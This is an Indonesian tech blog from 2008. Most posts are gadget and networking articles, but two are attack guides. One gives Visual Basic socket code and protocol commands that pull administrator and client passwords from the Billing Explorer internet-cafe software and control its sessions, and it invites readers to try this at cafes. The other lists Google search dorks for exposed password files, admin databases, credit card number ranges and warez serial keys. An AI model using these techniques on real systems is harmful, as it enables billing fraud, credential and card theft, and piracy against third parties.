This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Sabtu, 20 Desember 2008

Quantum of Solace Vaio TT, Laptop si Bond 007


Sony meluncurkan laptop edisi khusus, James Bond 007 Sony Vaio TT Series Notebook. Laptop ini menggunakan sasis terbuat dari fiber karbon dengan logo 007 di pojok kiri kibor dan sarung dari kulit.

Peranti bisnis si agen mata-mata asal Inggris ini memiiki ukuran layar widescreen LCD 11,1 inci. Memori RAM yang dimilikinya berkapasitas 2GB dan Solid State Drive 64GB. Selain itu terdapat HDMI out dan sepasang headphone.Notebook seharga US$ 2.399 (sekitar Rp 24 juta) ini juga memliki paduan berupa media simpan USB flash drive. Media simpan yang dinamai Limited Edition 007 8GB Micro Vault Click USB Flash Drive ini dipasarkan senilai US$ 29.99 (sekitar Rp 300.000).

007 Quantum of Solace 8GB Micro Vault Click USB flash drive edisi khusus ini dilengkapi dengan konekor USB yang tersembunyi. USM8GL/B juga meneyrtakan Virtual Expander untuk menyimpan info sebanyak tiga kali secara virtual. Dalam paket penjualan flash drive ini langsung dilengkapi dengan Quantum of Solace movie trailer dan behind-the-scenes.

Tertarik untuk bergaya bak James Bond, sang 007?

LifeBook N7010, Notebook dengan Layar Sentuh 4 Inci


Fujitsu meluncurkan notebook inovatif LifeBook N7010. Notebook yang memiliki ukuran layar LCD 16 inci ini juga menyertakan layar sentuh berukuran empat inci. Layar ini posisinya berada di atas kibor.Fujitsu menamai layar kedua ini sebagai “Touch Zone”. Menariknya, layar sentuh ini berfungsi monitor kedua yang bisa dipasangi dengan ikon shortcut aplikasi.

Spesifikasi yang dimiliki laptop ini di antaranya prosesor Intel Core 2 Duo 2,26 GHz P8400, kartu grafis ATI Radeon HD 3470 256 MB, memori RAM 4GB, hard drive 320 GB, Blu-ray, kamera web 1.3 megapixel, dan WiFi / Bluetooth. Fujitsu LifeBook N7010 mulai dipasarkan 10 November seharga US$ 1.499 (sekitar Rp 15 juta).

Senin, 01 Desember 2008

19 Printer Terbaru Keluaran HP


19 Printer Photosmart terbaru keluaran HP ini dikemas dengan ukuran mini dengan berbagai pilihan tipe. Salah satu diantaranya adalah Photosmart 516 dengan cardslots dan Display seharga 130 US $.
Produk lainnya adalah photosmart A618 yang telah terintegrasi dengan modul Bluetooth dan fungsi optimalisasi gambar, lalu Photosmart A717 yang telah dilengkapi dengan fungsi optimalisasi gambar dan mampu terhubung dengan siaran TV serta berkapasitas hingga 4 GByte dalam menyimpan dokumen foto anda. Kedua model tersebut akan dilempar ke pasaran pada bulan September dengan harga : A618 235 US $ dan A717 325 US $.

Printer Photosmart B8350 dan Photosmart Pro B9180 dirancang untuk mencetak gambar berukuran kertas A3. Keduanya dibandrol dengan harga 450 US $ untuk printer B8350 dan 900 US $ untuk B9180.

Untuk format kertas A4 tersedia beberapa pilihan printer, yaitu : Photosmart D6116 seharga 130 US $, Photosmart D7360 seharga 260 US $ dan Deskjet 2360 yang masih belum diketahui harganya. Selain itu HP juga berinovasi dalam formulasi tinta terbarunya dan printer lasernya.


Rabu, 26 November 2008

Ultra Mobile Personal Computer, suatu trend mobile computing


Akhir tahun 2007 mulai terdapat suatu trend baru dalam pasar komputer portable, note book. Banyak vendor-vendor komputer yang mulai melirik membuat UMPC (ultra mobile personal computer), yang merupakan bentuk jenis note book yang lebih ringan dan lebih kecil ukurannya. Paradigma small is beautiful rupanya sangat laris dianut dalam kompetisi pasar notebook yang super ketat.Akhir tahun 2007 mulai terdapat suatu trend baru dalam pasar komputer portable, note book. Banyak vendor-vendor komputer yang mulai melirik membuat UMPC (ultra mobile personal computer), yang merupakan bentuk jenis note book yang lebih ringan dan lebih kecil ukurannya. Paradigma small is beautiful rupanya sangat laris dianut dalam kompetisi pasar notebook yang super ketat.



Produk UMPC yang tegolong rawal dan laris adalah ASUS EEE PC. Merupakan komputer sub notebook dengan ukuran layar 7 inchi dengan memori flash drive. Desain yang unik dan elegan menjadikan gadget ini laris kayak kacang goreng, bahkan inden pula.

Sebelum ASUS EEE PC sebetulnya ide UMPC telah diperkenalkan oleh Nicholas Negroponte, seorang dosen MIT, peneliti Media lab yang memiliki visi melalui OLPC (one laptop perchildren). Dengan bantuan Media Lab dan disponsori Intel, OLPC mampu mendesain sub notebook murah (dengan harga > $100) khusus untuk digunakan bagi pendidikan negara-negara berkembang di Asia, Afrika dan Amerika Selatan. Sayangnya informasi terakhir program one laptop per children tersebut mengalami hambatan.

Jumat, 07 November 2008

Technology

Technology tak takan pernah berhenti berkembang..Temukan New Technology di sini

Kamis, 30 Oktober 2008

Hack Billing explorer

Memanfaatkan Kelemahan Billing Explorer, Sekedar informasi buat operator warnetSebelum masuk ke inti permasalahan, ada yang perlu anda persiapkan:
- Coba download program demo nya di www.billingexplorer.com
Server program dan client program
- Setelah berhasil mendownload ke duanya, silahkan anda install
terlebih dahulu.
- Apabila proses installasi selesai, silahkan anda coba jalankan kedua
program tersebut pada satu komputer.
- Jalankan program server terlebih dahulu kemudian program clientnya
- Secara default passwordnya akan berisi 008
- ok saya anggap anda semua udah bisa menjalankannya.

Nah apabila selesai proses diatas coba anda jalankan hanya program servernya saja. Kita akan liat kelemahan yang terjadi pada koneksinya.Nah apabila selesai proses diatas coba anda jalankan hanya program servernya saja. Kita akan liat kelemahan yang terjadi pada koneksinya.

Kalo kalian pake program packet snipper mungkin akan kelihatan, data apa saja yang dikirim ke client…….Setelah diamati beberapa menit dengan program packetsnipper ternyata setiap data yang dikirim ke client melalui winsock tidak terproteksi atau dalam kata lain hanya berupa plaintext saja…ops….ternyata….he…he…. :spiteful:

Okeh kita lanjut lagi, jika dilihat pada data yang dikirim oleh program server selalu diawali dengan ‘YYY’ dan sebaliknya apabila dikirim dari client ke server akan diawali dengan ‘XXX’ (tanpa apoustrop).

(”Mungkin hal seperti ini akan berakibat fatal, ini bisa kita jadikan contoh bahwa data yang dikirim diusahakan harus terenkripsi untuk menghindari dan meminimalisasi pencurian data2 yang berbentuk plain text.”)

Ada beberapa perintah yang dikirim dari client ke server seperti:

XXX$personal$2$HIPERSEKS$

kalo saya gak salah artikan perintah diatas, menjadi spt ini:
XXX -> Perintah dari client
$ -> sebagai seperator atau pemisah parameter
personal -> type login yang digunakan user
$ -> sebagai seperator atau pemisah parameter
2 -> No PC Client yang telah di setting
$ -> sebagai seperator atau pemisah parameter
HIPERSEKS -> Nama yang digunakan oleh user

Maka kesimpulannya kita bisa login ke program server tanpa program client bawaanya dan kita bisa ganti dengan program kecil buatan sendiri.

Coba anda buat satu project dengan:
1 form, 1 winsock control, 2 commandbutton dan 2 textbox
untuk text1 rubah properti Multiline= True dengan Scrollbars=Both

Private Sub Command1_Click ()
SOCK.Close
‘// Masukan IPAddress Servernya dengan Port 1500 (default port)
SOCK.Connect “192.168.0.1″, “1500″
End Sub

Private Sub Command2_Click ()
If SOCK.State = sckConnected Then SOCK.SendData Text2.Text
End Sub

Private Sub SOCK_DataArrival( ByVal bytesTotal As Long )
Dim Data As String
SOCK.GetData Data
Text1.SelText = Data & vbCrLf & String (50, “-”) & vbCrLf
End Sub

setelah selesai koding diatas coba anda jalankan, lakukan koneksi keserver dengan menekan tombol command1. Apabila berhasil koneksi ke server coba anda tuliskan beberapa perintah dibawah ini pada textbox2 dan diakhiri dengan menekan tombol Command2.

Perintah:
XXX$passY$2$

perintah diatas digunakan untuk melihat password client dan password server pada PC Client No 2 (dua). hasil data yang dikirim dari server ke client dengan menyertakan perintah diatas akan terlihat seperti ini:

YYY$passY$008$Warnet Integral$JL. Prof.Bunyamin 667 Purwokerto 0281-642492$Email info_008@yahoo.com - http://www.billingexplorer.com$111

kalo dilihat pada kata ‘008′ dan ‘111′, ini dapat diartikan sebagai password Administrator dan Password PC Client.

kita bisa klik tombol admin pada program clientnya, dan masukan passwordnya.
anda bisa mencoba beberapa perintah dibawah ini:
1. XXX$personal$2$HIPERSEKS$
(Login pada PC no 2 dengan nama user HIPERSEKS)
2. XXX$stop$2$HIPERSEKS
(untuk logout dari billing)
3. XXX$con$2$HIPERSEKS
4. XXX$infod2$2$
5. XXX$ablock$2$
6. XXX$admin$2$Admin
7. XXX$tutup$2$$

Anda bisa cari lagi perintah2 yg lain dengan menggunakan packet snipper seperti ‘EtherDetect Packet Sniffer’.

Selain itu ada beberapa kelemahan lain yang terdapat pada program ini, seperti tidak diproteksinya file executable dengan program-program compress exe, spt UPX,PE-COMPAT ataupun yg lain. ini sangat memudahkan untuk di CRack.

Sekedar info, program yang saya coba adalah Billing-Explorer Ver 4.40 Grand R-14a. yang di compile dengan visual basic v 5.0

Jadi kalo jalan-jalan ke warnet dan kebetulan billing nya menggunakan program ini, hmmm.m.m..mmmm…sekalian bisa dicoba…nih….

Selasa, 14 Oktober 2008

Jaringan

Topologi Bus
Karakteristik topologi ini adalah sebagai Berikut :

Disebut juga Daisy Chain.
• Paling banyak dipakai karena sederhana dalam instalasi.
• Pada topologi bus, terdapat satu jalur umum yang berbentuk suatu garis lurus. Yang mana kemudian masing-masing node dihubungkan kedalam jalur garis tersebut.
• Transmisi dari suatu workstation dapat menyebar dan menjalar ke workstation lainnya, ini disebabkan setiap workstation menggunakan media transmisi yang sama.
• Dapat terjadi collision (dua paket data tercampur), karena sinyal mengalir dalam dua arah.
• Problem terbesar : jika salah satu segmen kabel putus, maka seluruh jaringan akan terhenti.
• Meskipun ada percabangan media transmisi, tetapi tidak membentuk jalur tertutup (closed loop).
• Berupa bentangan satu kabel yang kedua ujungnya ditutup oleh terminator dan terdapat node-node sepanjang kabel.
• Instalasi mudah dilakukan.
Topologi Star

Karakteristik topologi ini sebagai berikut :

• Medium transmisi yang digunakan dalam tipe topologi ini, membentuk jalur tertutup (closed loop), dan setiap workstation mempunyai kabel tersendiri untuk langsung berhubungan dengan file server, sehingga seluruh sistem tidak akan gagal bila ada salah satu kabel pada workstation yang terganggu.
• Mudah dikembangkan, karena tiap node hanya memiliki kabel yang langsung terhubung kecentral node.
• Dapat digunakan kabel yang "lower grade", karena hanya menghandle satu lalu lintas data, biasanya digunakan kabel UTP.Node-node tersambung langsung ke suatu node pusat (biasa berupa hub), sehingga mudah dikembangkan.
• Keuntungannya dari topologi star adalah apabila satu kabel node terputus, node lainnya tidak terganggu


Topologi Ring

Karakteristik topologi ini sebagai berikut :

• Dalam topologi ring, setiap node dihubungkan dengan node lain, sehingga membentuk lingkaran.
• Karena sistem transmisinya menggunakan kabel yang saling menghubungkan beberapa workstation dengan file server dalam bentuk lingkaran tertutup, maka tipe ini memiliki kelemahan, yaitu apabila pada salah satu hubungan ada yang putus, maka keseluruhan hubungan terputus.

Merencanakan LAN

Sekarang kita akan membahas bagaimana merencanakan suatu LAN yang baik. Tujuan utamanya untuk merancang LAN yang memenuhi kebutuhan pengguna saat ini dan dapat dikembangkan di masa yang akan datang sejalan dengan peningkatan kebutuhan jaringan yang lebih besar. Desain sebuah LAN meliputi perencanaan secara fisik dan logic . Perencanaan fisik meliputi media yang digunakan bersama dan infrastruktur LAN yakni pengkabelan sebagai jalur fisik komunikasi setiap devais jaringan. Infrastruktur yang dirancang dengan baik cukup fleksibel untuk memenuhi kebutuhan sekarang dan masa datang.
Metode perencanaan LAN meliputi :
• Seorang administrator network yang bertanggung jawab terhadap jaringan.
• Pengalokasian IP address dengan subnetting.
• Peta letak komputer dari LAN dan topologi yang hendak kita gunakan.
• Persiapan fisik yang meliputi pengkabelan dan peralatan lainnya.
Di antara hal-hal yang perlu diperhatikan dalam perancangan LAN adalah lokasi fisik itu sendiri. Peta atau cetak biru bangunan-bangunan yang akan dihubungkan serta informasi jalur kabel (conduit) yang ada dan menghubungkan bangunan-bangunan tersebut sangat diperlukan. Jika peta seperti ini tidak ada maka perlu digambarkan peta dengan cara menurut kabel-kabel yang ada. Secara umum dapat diasumsikan bahwa pengkabelan yang menghubungkan bangunan-bangunan atau yang melewati tempat terbuka harus terdapat di dalam conduit. Seorang manajer jaringan harus menghubungi manajer bangunan untuk mengetahui aturan-aturan pengkabelan ini sebab manajer bangunan yang mengetahui dan bertanggung jawab atas bangunan tersebut. Pada setiap lokasi (yang dapat terdiri dari beberapa bangunan) harus ditunjuk seorang manajer jaringan. Manajer jaringan harus mengetahui semua konfigurasi jaringan dan pengkabelan pada lokasi yang menjadi tanggung jawabnya. Pada awalnya tugas ini hanya memakan waktu sedikit. Namun sejalan dengan perkembangan jaringan menjadi lebih kompleks, tugas ini berubah menjadi tugas yang berat. Jadi sebaiknya dipilih orang yang betul-betul berminat dan mau terlibat dalam perkembangan jaringan.

Sabtu, 20 September 2008

Google Hacking

Google merupakan satu dari beberapa perusahaan sangat besar didalam bidang bisnis internet. Selain menjadi satu dari beberapa perusahaan terbesar di dunia internet ini, google juga ternyata menjadi satu dari beberapa website yang dapat dikatakan memiliki jumlah catatan pengunjung terbanyak, bagaimana tidak? Segala sesuatu yang sehubungan dengan internet sekarang ini semuannya dapat dicari melalui google, dari data mengenai masalah umum, berita, hingga informasi teknis.

Berbicara sehubungan dengan sub judul artikel ini, yang berbunyi “Taking Advantage of Technology”, dalam artikel kali ini saya akan sedikit membahas mengenai sebuah tehnik hacking yang menggunakan layanan yang diberikan daripada google ini sendiri.

Seperti yang telah kita ketahui, bahwa dengan adanya kemajuan teknologi dan semakin berkembangnya industri internet, tentu juga banyak hal hal lain yang terjadi sehubungan dengan system keamanan. Majunya sebuah jenis teknologi, tentu akan diimbangi dengan tehnik “men-dobrak” daripada system itu sendiri. Ini dapat kita lihat dalam kasus google.com sebab telah diketahui bahwa selain berguna sebagai sebuah search engine paling ampuh dengan database yang mencapai miliaran jumlahnya, google pun tidak dapat menutupi kenyataan bahwa banyak hacker yang menggunakan google.com sebagai sarana melakukan tindak “iseng-iseng” di internet, sebab selain dapat mencari data data seperti MP3, Film, Artikel, dan lain sebagainyam google pun memiliki kemampuan untuk dapat mencari data yang dapat digolongkan sebagai data rahasia.

Dengan menggunakan sedikit kemampuan unik, dan tentunya dengan menggunakan google.com sebagai sarana pencarian data, ternyata orang dapat menemukan banyak data sensitive di Internet. Data data yang dimaksud dengan data sensitive adalah data yang dapat digolongkan sebagai data pribadi, seperti nomor kartu kredit, dan password.

Menggunakan google tentunya sudah bukanlah merupakan sebuah hal yang aneh lagi bagi mereka yang sering menggunakan internet. Ditambah lagi, mengingat penggunaan daripada website google.com itu sendiri yang sangat user-friendly, penulis merasa tidak perlu untuk menjelaskan lebih lanjut mengenai metode mencari dengan menggunakan google. Dalam artikel ini kita akan membahas lebih kearah dasar metode pencarian serta pengenalan string dalam penggunaannya di google.com serta contoh contoh bentuk kalimat pencarian yang sangat membantu dalam melakukan google hacking nantinya.

Tehnik Dasar Pencarian
  • Penggunaan string (+) digunakan untuk melakukan pencarian paksa terhadap huruf yang serupa. Sedangkan (-) digunakan untuk men-tidak sertakan sebuah kata dalam pencarian.
  • Untuk mencari sebuah susunan kata tertentu dengan sangat tepat, maka anda perlu menggunakan string (“ “)
  • Sedangkan titik (.) digunakan untuk melakukan metode pencarian text satu karakter.
  • Tanda bintang melambangkan segala huruf.
  • Syntax site: digunakan untuk memerintahkan google supaya melakukan pencarian dalam situs tertentu saja. Alamat situsnya dapat dimasukan sesudah tanda titik dua. (e.g site:www.th0r.name)
  • Syntax filetype: digunakan untuk memerintahkan google untuk melakukan pencarian terhadap jenis file secara ter-spesifikasi. Jenis file yang ingin dicari dapat diposisikan setelah tanda titik dua.
  • Syntax link: digunakan untuk memerintahkan google supaya hanya melakukan pencarian dalam hyperlinks tertentu.
  • Syntax cache: digunakan untuk memerintahkan google untuk menampilkan versi daripada sebuah webpage pada saat google membukanya. Keterangan mengenai alamat website dapat ditambahkan pada bagian akhir sesudah tanda titik dua.
  • Syntax intitle: dalam hal ini google diperintahkan hanya untuk mencari keterangan berdasarkan title daripada dokumen dokumen tertentu, sesuai dengan yang kita ketikan pada bagian akhir syntax setelah tanda titik dua.
  • Syntax inurl: Google akan melakukan pencarian data dalam syntax URL tertentu yang diberikan setelah tanda titik dua.

Mengenal lebih dalam Syntax Untuk Google Hacking
Setelah mengenal dasar metode pencarian menggunakan google.com, sekarang kita akan beralih ke syntax yang dapat dikatakan lebih specific dan lebih komplikasi dibandingkan syntax yang telah diberikan diatas. Mari sekarang kita perhatikan syntax dibawah ini:

intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurlasslist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"
Contoh contoh yang diberikan diatas adalah contoh contoh syntax yang bias dikatakan digunakan untuk mencari password ataupun admin page, dan juga bias digunakan untuk mencari page yang tidak seharusnya dapat dibuka oleh user biasa. Kombinasi kombinasi lain dapat digunakan untuk melakukan pencarian yang lain dan hanya perlu dimodifikasi sesuai dengan kebutuhan dan target anda.
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
Sedangkan syntax yang diatas ini digunakan untuk mencari nomor kartu kredit orang menggunakan google.com

Bedah Syntax
Setelah melihat beberapa syntax yang lebih complex diatas, mari kita sedikit membahas maksud dari syntax syntax yang ada dibawah ini.
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Seperti yang dapat kalian perhatikan dari keseluruhan syntax. Bagian yang diganti hanya selalu pada bagian sesudah kata “Parent Directory”. Kenapa? Setelah kita pelajari dibagian awal artikel ini tadi bahwa syntax (“ “) digunakan untuk melakukan pencarian kalimat secara pasti, dan (-) digunakan untuk men-tidak ikut sertakan sebuah kata dalam keseluruhan kalimat pencarian. Sehingga dalam syntax ini dapat kita artikan secara kasar juga sebagai berikut:
  • “Parent Directory”  Pencari sedang melakukan pencarian untuk kata Parent Directory secara pasti dan tidak secara terpencar (Parent sendiri dan Directory sendiri)
  • Pencari menaruh apa yang ingin dia cari. (Contoh : /appz/ adalah aplikasi. Dan MP3, berarti dia mencari mengenai hal MP3)
  • -xxx  Pencari tidak menginginkan adanya konten xxx dalam pencariannya.
  • -html  Pencari tidak menginginkan adanya konten html dalam pencariannya.
  • -htm  Pencari tidak menginginkan adanya konten htm dalam pencariannya.
  • -php  Pencari tidak menginginkan adanya konten php dalam pencariannya.
  • Dan lain sebagainya.

List Syntax, serta Kombinasinya
Setelah membahas mengenai metode pencarian, syntax yang cukup komplikasi hingga beda arti syntax, pada bagian sebelumnya. Pada bagian ini kita akan membahas mengenai kombinasi syntax dan bagaimana fungsinya, serta bagaimana membaca arti syntax tersebut.
Inurl:Microsoft filetype:iso
Anda akan mencari pada setiap URL berbau kata Microsoft untuk segala file yang bertipe iso. Anda dapat merubah URL dan Filetype menjadi apapun sesuai kebutuhan anda.
"# -FrontPage-" inurl:service.pwd
Dengan menggunakan syntax ini, anda menyuruh google untuk mencarikan password frontpage untuk anda.
http://*:*@www”
Syntax diatas digunakan untuk melakukan pencarian password pada line url anda. Dalam kasus ini anda mencari user dan password yang tulisannya apa saja, pada domain name tertentu. (Masukan nama domain tanpa .com .net / .org) – (Contoh : “http://*:*@www” neotek)
Cara lain untuk menggunakan syntax ini dalam bentuk yang berkesebalikan ialah dengan cara menuliskan syntax seperti ini:
http://th0r:th0r@www”  dalam kasus ini anda mencari username dan password th0r pada website yang nantinya akan anda masukan alamatnya dibagian belakang.
“sets mode +k”
Nampak seperti IRC? Memang betul. Ada banyak juga room di IRC yang menggunakan key untuk melakukan join kedalam room tersebut dan dengan menggunakan syntax ini, anda akan dapat menemukan beberapa key yang tercatat dalam log percakapan channel / room tersebut.
Allinrul: Admin mdb
Kalian akan menemukan banyak web page sehubungan dengan administrator system page.
Intitle: “Index Of” config.php
Dengan syntax diatas, kalian akan diberikan setumpuk data mengenai website website yang memiliki file config.php
Bahkan google dapat juga dijadikan ajang untuk mencari warez serial code. Katakanlah anda membutukan Windows XP Pro serial number. Anda hanya perlu membuka http://www.google.com dan mengetikan syntax sebagai berikut:
“Windows XP Professional” 94FBR
Yang dapat juga kita artikan sebagai pencarian kata Windows XP Professional tanpa di pisahkan. Sedangkan 94FBR itu sendiri adalah sebuah code yang kerapkali dimasukan ke dalam bagian daripada registration code yang ada pada kebanyakan software Microsoft. Oleh dari karena hal tersebut, penggunaan code 94FBR mungkin akan cukup membantu dalam melakukan pencarian serial code. Akan tetapi, segalanya tetap dapat dimodifikasi sesuai dengan keinginan serta keperluan anda.
Sekian cerita singkat saya kali ini mengenai Google Hacking. Perlu diingat bahwa bagaimana tingkat kesuksesan dalam menggunakan google hacking ini adalah 100% tergantung daripada ide dan kreatifitas anda sendiri dalam mengkombinasikan syntax dan menyesuaikan data yang anda ketahui mengenai suatu target tertentu. Tapi yang perlu saya jelaskan disini, bahwa google hacking adalah salah satu tehnik yang cukup mengerikan apabila anda dapat menggunakannya dengan sangat baik. Hal inipun didukung dengan kenyataan bahwa kebanyakan ahli security di dunia telah menempatkan Google Hacking sebagai salah satu tehnik yang sejajar dan sama berbahayanya dengan SQL Injection, Cross-site Scripting dan Remote Execution Command.
Credit and Special Thanks To: Johnny Long With His Book Named as “Google Hacking”
Tak lupa juga saya mengucapkan terima kasih kepada Epel (Thanks yoo =P), Ignes (Yang sudah nemenin chat waktu lg buat ini artikel), Cindy (Yang juga sudah nemenin ngobrol sampe artikelnya kelar) Hehehe, juga Jeffry dan Nico. Serta beberapa teman teman saya yang lainnya.
Akhir kata, saya hanya ingin mengucapkan. Teknologi berkembang untuk di eksploitasi fungsi dan manfaatnya. Kalau meng-eksploitasi kekayaan alam itu salah, meng-eksploitasi funsi teknologi adalah sebuah hal dapat dikatakan bagus. Oleh dari karena itu, teruslah mencari keuntungan daripada penggunaan system itu sendiri.